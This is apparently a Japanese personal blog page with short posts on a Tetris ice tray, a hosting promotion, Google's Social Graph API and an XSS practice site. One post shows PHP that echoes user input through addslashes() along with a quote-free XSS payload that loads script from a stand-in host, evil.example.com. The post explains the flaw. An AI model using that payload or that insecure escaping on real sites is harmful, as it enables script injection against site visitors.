[ファミコン]テトリスブロック型製氷皿
Tags: 徒然文
TETRICE on the Behance Network (via ITクオリティ)
製氷皿のカラーリングがいい感じ。おいしそうって思ったら氷に透明感があるからなのね。白濁の原因になる不純物や気泡を残さないような氷に仕上げるには少し努力が必要みたい。透明な氷の作り方
ロリポップで身も心も非モテ男子になろう!
Tags: 徒然文
非モテ男子と自己申告して申し込むと1575円安くなるらしい。プライドがこれより安い場合はお得かも。
『 非モテ男子 』 は、初期費用が半額となります。
お申込みの際、必ず 『 非モテ男子 』 にチェックを入れてお申し込みください。
[PHP]ActionScriptの達人もXSS攻撃には疎い
某有名FLASHerさんが珍しくPHPで作品を公開していたので、「へえ、この人PHPも使うんだ」と思いながら、間違えて変なの入力したら(嘘だけど)、以下のようにして入力を扱っている様子。
<?php
echo addslashes($_GET['txt']);
?>
これって一見良さそうだけど以下のようなシングルクオートもダブルクオートも使わないスクリプトは読み込める。クオートなくても動くってのがまず驚きだけどクオートを書かないって発想がさらに驚愕 (参考:XSS (Cross Site Scripting) Cheat Sheet)。
<script src=http://evil.example.com/xxx.js /></script>
読み込んだxxx.jsファイルの中身はaddslashes()の制限を受けないので何でもアリの無法地帯。うまいこと第三者をおびきよせてxxx.jsの中身を読ませることができる。まあただの揚げ足取りなんだけど(でもセキュリティ屋がやってることはこういうことでしょ?)要するに言いたかったことは、このFLASHerさんはActionScriptは(少なくとも僕から見て)達人級であってプログラムを書くこと自体には熟練しているということ。ほんとにプログラミングゼロからの人間にセキュリティを気にしろって言うのは無理があると思っただけ。
[Google][API]rel=”friend”。target=”_blank”でいっぱいいっぱいなのにまた増えた。
Tags: 徒然文
はてなダイアリーとかYahoo!ブログも似たような感じだけど、はてな住民やYahoo!ID持ってないとコメントできないってとこが超絶中途半端(中途半端が超絶という意味)に閉鎖的。苦情書きたくてもIDないとダメとか意味わからん。なんか内輪ノリだし。こういうのはとっととなくなってもっとオープンにしてもらいたいです。ということでtarget=”friend”頑張って書くよ!
Googleは2008年2月1日,Web上のリンクから交友関係を抽出するWebサービスのAPI「Social Graph API」を公開した。ブログやプロフィール・ページのURLなどを入力すると,Googleが収集した,そのサイトを友人としてリンクしている友人のサイトを出力する。このサービスを使うことで,SNS(ソーシャル・ネットワーキング・サービス)サイトを利用しなくともブログ同士でSNSのような機能を実現することが可能になる。
ブログ同士で“SNS”が作れる,Googleが「Social Graph API」サービス公開:ITpro
Social Graph API - Google Code
[セキュリティ]悪さをする側の視点に立つ
Tags: 徒然文
プログラムのセキュリティホールを探していくゲーム的サイト、XSS Challengesが流行ってるみたい。ちょうど入門PHPセキュリティ(やっと届いた)を読み始めたところだったのでとても興味深い。このサイトではクロスサイトスクリプティング(僕にとっては未だバズワード)でインジェクションする内容は危険ではないようなので、むしろこれでビックリするような情報が抜けるようなデモンストレーションがあればさらに教育的だった。実際に泥棒が家に侵入するとどういった被害に遭う可能性があるかは大多数の人がイメージできるけど、インターネットの世界だとそれはもう確実に困難。実生活よりももっと具体的な犯行手口と予想被害を見せていかないと、なかば怒り気味に防犯、防犯と叫んでみたり、他人のソースコードの穴を見つけて嘲笑まがいのトラックバックをするだけでは皆に全体像は見えてこない。悪さの方法を知って面白半分にやる輩も出て来るだろうけど、それ以上に「え、これやばくない?」みたいにセキュリティ意識に関する利益の方が多いだろうし。遊びだとしてもこのサイトのやり方には賛成。そして全ステージクリアしてる人とかすげーよなあ。惚れるぜ。
-
About me
